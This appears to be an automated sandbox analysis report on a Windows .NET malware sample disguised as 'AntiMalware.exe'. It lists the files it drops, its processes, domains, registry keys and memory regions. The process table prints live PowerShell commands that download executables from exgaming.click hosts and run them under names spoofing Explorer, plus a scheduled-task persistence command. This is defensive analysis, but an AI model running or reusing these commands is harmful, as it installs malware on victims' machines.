Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
ZzOTKK2V8l.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\AntiMalware.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Unknown
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
Unknown
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AntiMalware.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ZzOTKK2V8l.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41czupjo.11w.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ag0v43kb.w5l.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdlqgb4l.wva.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwesvxkc.b1d.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fodzmeuf.our.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fojzr421.p4x.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fucrusc5.ocm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2c43j1h.3mv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghtzm0mx.onc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfhbdawu.nmj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khbwq4j5.vga.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxtew4vh.p23.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5eemjvw.uff.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5fxuzzg.r5e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rb2ke5hn.ifi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttvtkbfz.z3p.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujig1gei.dz1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v50bsfgd.m0c.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwrzhkpr.nr3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1mu3b4q.rej.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xchwvitp.ooz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xj3jq34d.ljf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xs4dv4nh.n33.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpo0oqp5.kfv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\MyData\DataLogs.conf
|
ASCII text
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators, with overstriking
|
dropped
|
There are 24 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\ZzOTKK2V8l.exe
|
"C:\Users\user\Desktop\ZzOTKK2V8l.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe')
& powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell
Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
& exit
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""
|
|
|
|
C:\Windows\System32\schtasks.exe
|
schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
|
|
|
|
C:\Users\user\AppData\Roaming\AntiMalware.exe
|
C:\Users\user\AppData\Roaming\AntiMalware.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe')
& powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell
Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
|
|
|
|
C:\Users\user\AppData\Roaming\AntiMalware.exe
|
"C:\Users\user\AppData\Roaming\AntiMalware.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe')
& powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell
Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\timeout.exe
|
timeout 3
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 17 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
xcu.exgaming.click
|
unknown
|
|
|
|
xcu5.exgaming.click
|
unknown
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.156.65.172
|
unknown
|
Bulgaria
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit
|
Version
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
602000
|
unkown
|
page readonly
|
|
|
|
36E6000
|
trusted library allocation
|
page read and write
|
|
|
|
3A34000
|
trusted library allocation
|
page read and write
|
||
|
39F6000
|
trusted library allocation
|
page read and write
|
||
|
3AA6000
|
trusted library allocation
|
page read and write
|
||
|
1E84A000
|
stack
|
page read and write
|
||
|
3B9B000
|
trusted library allocation
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
3A77000
|
trusted library allocation
|
page read and write
|
||
|
3B11000
|
trusted library allocation
|
page read and write
|
||
|
1C100000
|
heap
|
page read and write
|
||
|
3B6D000
|
trusted library allocation
|
page read and write
|
||
|
36B7000
|
trusted library allocation
|
page read and write
|
||
|
1705000
|
heap
|
page read and write
|
||
|
3A9D000
|
trusted library allocation
|
page read and write
|
||
|
3C84000
|
trusted library allocation
|
page read and write
|
||
|
3B6D000
|
trusted library allocation
|
page read and write
|
||
|
3B57000
|
trusted library allocation
|
page read and write
|
||
|
39D6000
|
trusted library allocation
|
page read and write
|
||
|
24A9A5C0000
|
heap
|
page read and write
|
||
|
3947000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
DF4000
|
stack
|
page read and write
|
||
|
3A0D000
|
trusted library allocation
|
page read and write
|
||
|
359F000
|
stack
|
page read and write
|
||
|
3B26000
|
trusted library allocation
|
page read and write
|
||
|
13658000
|
trusted library allocation
|
page read and write
|
||
|
3A52000
|
trusted library allocation
|
page read and write
|
||
|
1DB4E000
|
stack
|
page read and write
|
||
|
1C3C0000
|
heap
|
page read and write
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C05000
|
trusted library allocation
|
page read and write
|
||
|
1D10E000
|
stack
|
page read and write
|
||
|
15B5000
|
heap
|
page read and write
|
||
|
39ED000
|
trusted library allocation
|
page read and write
|
||
|
3A9F000
|
trusted library allocation
|
page read and write
|
||
|
3ACA000
|
trusted library allocation
|
page read and write
|
||
|
3C49000
|
trusted library allocation
|
page read and write
|
||
|
24A9A860000
|
heap
|
page read and write
|
||
|
3A67000
|
trusted library allocation
|
page read and write
|
||
|
1B650000
|
trusted library allocation
|
page read and write
|
||
|
3994000
|
trusted library allocation
|
page read and write
|
||
|
37E1000
|
trusted library allocation
|
page read and write
|
||
|
17AE000
|
stack
|
page read and write
|
||
|
3C1F000
|
trusted library allocation
|
page read and write
|
||
|
EB0000
|
heap
|
page read and write
|
||
|
3B37000
|
trusted library allocation
|
page read and write
|
||
|
38E5000
|
trusted library allocation
|
page read and write
|
||
|
39D9000
|
trusted library allocation
|
page read and write
|
||
|
11C5000
|
heap
|
page read and write
|
||
|
3B08000
|
trusted library allocation
|
page read and write
|
||
|
36A8000
|
trusted library allocation
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
EF6000
|
heap
|
page read and write
|
||
|
3C57000
|
trusted library allocation
|
page read and write
|
||
|
1F44C000
|
stack
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
|
3A45000
|
trusted library allocation
|
page read and write
|
||
|
39C7000
|
trusted library allocation
|
page read and write
|
||
|
3C08000
|
trusted library allocation
|
page read and write
|
||
|
FAB000
|
heap
|
page read and write
|
||
|
3B16000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
136E3000
|
trusted library allocation
|
page read and write
|
||
|
1C350000
|
heap
|
page read and write
|
||
|
3B2B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
3AE9000
|
trusted library allocation
|
page read and write
|
||
|
3A6B000
|
trusted library allocation
|
page read and write
|
||
|
24A9A791000
|
heap
|
page read and write
|
||
|
3A05000
|
trusted library allocation
|
page read and write
|
||
|
3B53000
|
trusted library allocation
|
page read and write
|
||
|
24A9A7A2000
|
heap
|
page read and write
|
||
|
F50000
|
heap
|
page read and write
|
||
|
3651000
|
trusted library allocation
|
page read and write
|
||
|
3A25000
|
trusted library allocation
|
page read and write
|
||
|
110C000
|
heap
|
page read and write
|
||
|
1DF4C000
|
stack
|
page read and write
|
||
|
7FF848E4B000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A1C000
|
trusted library allocation
|
page read and write
|
||
|
135AD000
|
trusted library allocation
|
page read and write
|
||
|
F78000
|
heap
|
page read and write
|
||
|
36CD000
|
trusted library allocation
|
page read and write
|
||
|
3981000
|
trusted library allocation
|
page read and write
|
||
|
3BFF000
|
trusted library allocation
|
page read and write
|
||
|
3A07000
|
trusted library allocation
|
page read and write
|
||
|
1D63F000
|
stack
|
page read and write
|
||
|
160332F0000
|
heap
|
page read and write
|
||
|
FD953CB000
|
stack
|
page read and write
|
||
|
3C71000
|
trusted library allocation
|
page read and write
|
||
|
3695000
|
trusted library allocation
|
page read and write
|
||
|
3BF2000
|
trusted library allocation
|
page read and write
|
||
|
3A1B000
|
trusted library allocation
|
page read and write
|
||
|
1DF50000
|
heap
|
page read and write
|
||
|
F79000
|
heap
|
page read and write
|
||
|
392E000
|
trusted library allocation
|
page read and write
|
||
|
3652000
|
trusted library allocation
|
page read and write
|
||
|
3A65000
|
trusted library allocation
|
page read and write
|
||
|
3C03000
|
trusted library allocation
|
page read and write
|
||
|
3AE1000
|
trusted library allocation
|
page read and write
|
||
|
F95000
|
heap
|
page read and write
|
||
|
1C4D5000
|
heap
|
page read and write
|
||
|
20590000
|
heap
|
page read and write
|
||
|
24A9A7A2000
|
heap
|
page read and write
|
||
|
1503000
|
trusted library allocation
|
page read and write
|
||
|
36DA000
|
trusted library allocation
|
page read and write
|
||
|
16034D95000
|
heap
|
page read and write
|
||
|
F97000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
39C4000
|
trusted library allocation
|
page read and write
|
||
|
3B79000
|
trusted library allocation
|
page read and write
|
||
|
3708000
|
trusted library allocation
|
page read and write
|
||
|
3CAC000
|
trusted library allocation
|
page read and write
|
||
|
3905000
|
trusted library allocation
|
page read and write
|
||
|
3BCE000
|
trusted library allocation
|
page read and write
|
||
|
1C3B4000
|
heap
|
page read and write
|
||
|
1040000
|
trusted library allocation
|
page read and write
|
||
|
3A49000
|
trusted library allocation
|
page read and write
|
||
|
F55000
|
heap
|
page read and write
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
3C51000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E1B000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B13000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
36D2000
|
trusted library allocation
|
page read and write
|
||
|
3BAF000
|
trusted library allocation
|
page read and write
|
||
|
3A07000
|
trusted library allocation
|
page read and write
|
||
|
14D0000
|
trusted library allocation
|
page read and write
|
||
|
39C5000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A9A7A2000
|
heap
|
page read and write
|
||
|
3B38000
|
trusted library allocation
|
page read and write
|
||
|
3C88000
|
trusted library allocation
|
page read and write
|
||
|
3993000
|
trusted library allocation
|
page read and write
|
||
|
7C5000
|
heap
|
page read and write
|
||
|
38C5000
|
trusted library allocation
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
3BAC000
|
trusted library allocation
|
page read and write
|
||
|
36BB000
|
trusted library allocation
|
page read and write
|
||
|
39A7000
|
trusted library allocation
|
page read and write
|
||
|
3B46000
|
trusted library allocation
|
page read and write
|
||
|
1D34E000
|
stack
|
page read and write
|
||
|
7FF848E33000
|
trusted library allocation
|
page read and write
|
||
|
3A3C000
|
trusted library allocation
|
page read and write
|
||
|
391B000
|
trusted library allocation
|
page read and write
|
||
|
3B88000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
3B31000
|
trusted library allocation
|
page read and write
|
||
|
36B9000
|
trusted library allocation
|
page read and write
|
||
|
1E444000
|
stack
|
page read and write
|
||
|
3B4F000
|
trusted library allocation
|
page read and write
|
||
|
39A3000
|
trusted library allocation
|
page read and write
|
||
|
39E2000
|
trusted library allocation
|
page read and write
|
||
|
396D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
EB6000
|
heap
|
page read and write
|
||
|
3C31000
|
trusted library allocation
|
page read and write
|
||
|
3958000
|
trusted library allocation
|
page read and write
|
||
|
3B48000
|
trusted library allocation
|
page read and write
|
||
|
3B99000
|
trusted library allocation
|
page read and write
|
||
|
39F4000
|
trusted library allocation
|
page read and write
|
||
|
304B000
|
heap
|
page read and write
|
||
|
39B1000
|
trusted library allocation
|
page read and write
|
||
|
36FE000
|
trusted library allocation
|
page read and write
|
||
|
3B0D000
|
trusted library allocation
|
page read and write
|
||
|
3B16000
|
trusted library allocation
|
page read and write
|
||
|
36AD000
|
trusted library allocation
|
page read and write
|
||
|
F26000
|
heap
|
page read and write
|
||
|
3AE5000
|
trusted library allocation
|
page read and write
|
||
|
3C66000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
39FA000
|
trusted library allocation
|
page read and write
|
||
|
3A27000
|
trusted library allocation
|
page read and write
|
||
|
14F0000
|
trusted library allocation
|
page read and write
|
||
|
3C9B000
|
trusted library allocation
|
page read and write
|
||
|
3B64000
|
trusted library allocation
|
page read and write
|
||
|
1530000
|
heap
|
page execute and read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
15B0000
|
heap
|
page read and write
|
||
|
3A3A000
|
trusted library allocation
|
page read and write
|
||
|
3A69000
|
trusted library allocation
|
page read and write
|
||
|
3B18000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
3990000
|
trusted library allocation
|
page read and write
|
||
|
1E63E000
|
stack
|
page read and write
|
||
|
3AB2000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
3927000
|
trusted library allocation
|
page read and write
|
||
|
398D000
|
trusted library allocation
|
page read and write
|
||
|
3B9D000
|
trusted library allocation
|
page read and write
|
||
|
1BEDD000
|
stack
|
page read and write
|
||
|
16034D90000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
10B5000
|
heap
|
page read and write
|
||
|
3A0B000
|
trusted library allocation
|
page read and write
|
||
|
36C0000
|
trusted library allocation
|
page read and write
|
||
|
394B000
|
trusted library allocation
|
page read and write
|
||
|
1C730000
|
heap
|
page read and write
|
||
|
1B0E000
|
stack
|
page read and write
|
||
|
F21000
|
heap
|
page read and write
|
||
|
3B3A000
|
trusted library allocation
|
page read and write
|
||
|
1C343000
|
heap
|
page read and write
|
||
|
3BDF000
|
trusted library allocation
|
page read and write
|
||
|
3B59000
|
trusted library allocation
|
page read and write
|
||
|
103B000
|
heap
|
page read and write
|
||
|
36E6000
|
trusted library allocation
|
page read and write
|
||
|
3A82000
|
trusted library allocation
|
page read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
39C9000
|
trusted library allocation
|
page read and write
|
||
|
3AA3000
|
trusted library allocation
|
page read and write
|
||
|
137E1000
|
trusted library allocation
|
page read and write
|
||
|
3A47000
|
trusted library allocation
|
page read and write
|
||
|
364E000
|
stack
|
page read and write
|
||
|
3949000
|
trusted library allocation
|
page read and write
|
||
|
7FF4EC160000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FB8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C3BA000
|
heap
|
page read and write
|
||
|
3A23000
|
trusted library allocation
|
page read and write
|
||
|
24A9A9E0000
|
heap
|
page read and write
|
||
|
399E000
|
trusted library allocation
|
page read and write
|
||
|
1500000
|
trusted library allocation
|
page read and write
|
||
|
FD957FF000
|
stack
|
page read and write
|
||
|
3C64000
|
trusted library allocation
|
page read and write
|
||
|
397F000
|
trusted library allocation
|
page read and write
|
||
|
3A1E000
|
trusted library allocation
|
page read and write
|
||
|
3918000
|
trusted library allocation
|
page read and write
|
||
|
3B66000
|
trusted library allocation
|
page read and write
|
||
|
1C3D0000
|
heap
|
page read and write
|
||
|
3B9B000
|
trusted library allocation
|
page read and write
|
||
|
3BBB000
|
trusted library allocation
|
page read and write
|
||
|
38E1000
|
trusted library allocation
|
page read and write
|
||
|
3BD2000
|
trusted library allocation
|
page read and write
|
||
|
3669000
|
trusted library allocation
|
page read and write
|
||
|
3A88000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
392B000
|
trusted library allocation
|
page read and write
|
||
|
5D194FF000
|
stack
|
page read and write
|
||
|
3C21000
|
trusted library allocation
|
page read and write
|
||
|
3B03000
|
trusted library allocation
|
page read and write
|
||
|
36B6000
|
trusted library allocation
|
page read and write
|
||
|
3BB9000
|
trusted library allocation
|
page read and write
|
||
|
FD8000
|
heap
|
page read and write
|
||
|
3B96000
|
trusted library allocation
|
page read and write
|
||
|
1106000
|
heap
|
page read and write
|
||
|
1F98C000
|
stack
|
page read and write
|
||
|
39AD000
|
trusted library allocation
|
page read and write
|
||
|
3B27000
|
trusted library allocation
|
page read and write
|
||
|
1470000
|
heap
|
page read and write
|
||
|
1D23E000
|
stack
|
page read and write
|
||
|
1CA3D000
|
stack
|
page read and write
|
||
|
39DC000
|
trusted library allocation
|
page read and write
|
||
|
1171000
|
heap
|
page read and write
|
||
|
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CD0D000
|
stack
|
page read and write
|
||
|
38CE000
|
trusted library allocation
|
page read and write
|
||
|
3A18000
|
trusted library allocation
|
page read and write
|
||
|
39F2000
|
trusted library allocation
|
page read and write
|
||
|
32B1000
|
heap
|
page read and write
|
||
|
3C35000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C7B000
|
trusted library allocation
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
395A000
|
trusted library allocation
|
page read and write
|
||
|
3A5A000
|
trusted library allocation
|
page read and write
|
||
|
3683000
|
trusted library allocation
|
page read and write
|
||
|
3A4B000
|
trusted library allocation
|
page read and write
|
||
|
1BF5D000
|
stack
|
page read and write
|
||
|
3A60000
|
trusted library allocation
|
page read and write
|
||
|
3B7F000
|
trusted library allocation
|
page read and write
|
||
|
3702000
|
trusted library allocation
|
page read and write
|
||
|
3AB8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
3CA8000
|
trusted library allocation
|
page read and write
|
||
|
3A5C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A2F000
|
trusted library allocation
|
page read and write
|
||
|
3903000
|
trusted library allocation
|
page read and write
|
||
|
116D000
|
heap
|
page read and write
|
||
|
135A3000
|
trusted library allocation
|
page read and write
|
||
|
3C59000
|
trusted library allocation
|
page read and write
|
||
|
E15000
|
stack
|
page read and write
|
||
|
3A6F000
|
trusted library allocation
|
page read and write
|
||
|
3C40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
E80000
|
heap
|
page read and write
|
||
|
16033360000
|
heap
|
page read and write
|
||
|
1C2C0000
|
heap
|
page read and write
|
||
|
36C5000
|
trusted library allocation
|
page read and write
|
||
|
36AF000
|
trusted library allocation
|
page read and write
|
||
|
3C33000
|
trusted library allocation
|
page read and write
|
||
|
3AFA000
|
trusted library allocation
|
page read and write
|
||
|
10B0000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
365C000
|
trusted library allocation
|
page read and write
|
||
|
1C40B000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
1C3FB000
|
heap
|
page read and write
|
||
|
3995000
|
trusted library allocation
|
page read and write
|
||
|
24A9A6A0000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
38D0000
|
trusted library allocation
|
page read and write
|
||
|
3C99000
|
trusted library allocation
|
page read and write
|
||
|
3BE3000
|
trusted library allocation
|
page read and write
|
||
|
36D5000
|
trusted library allocation
|
page read and write
|
||
|
3B8A000
|
trusted library allocation
|
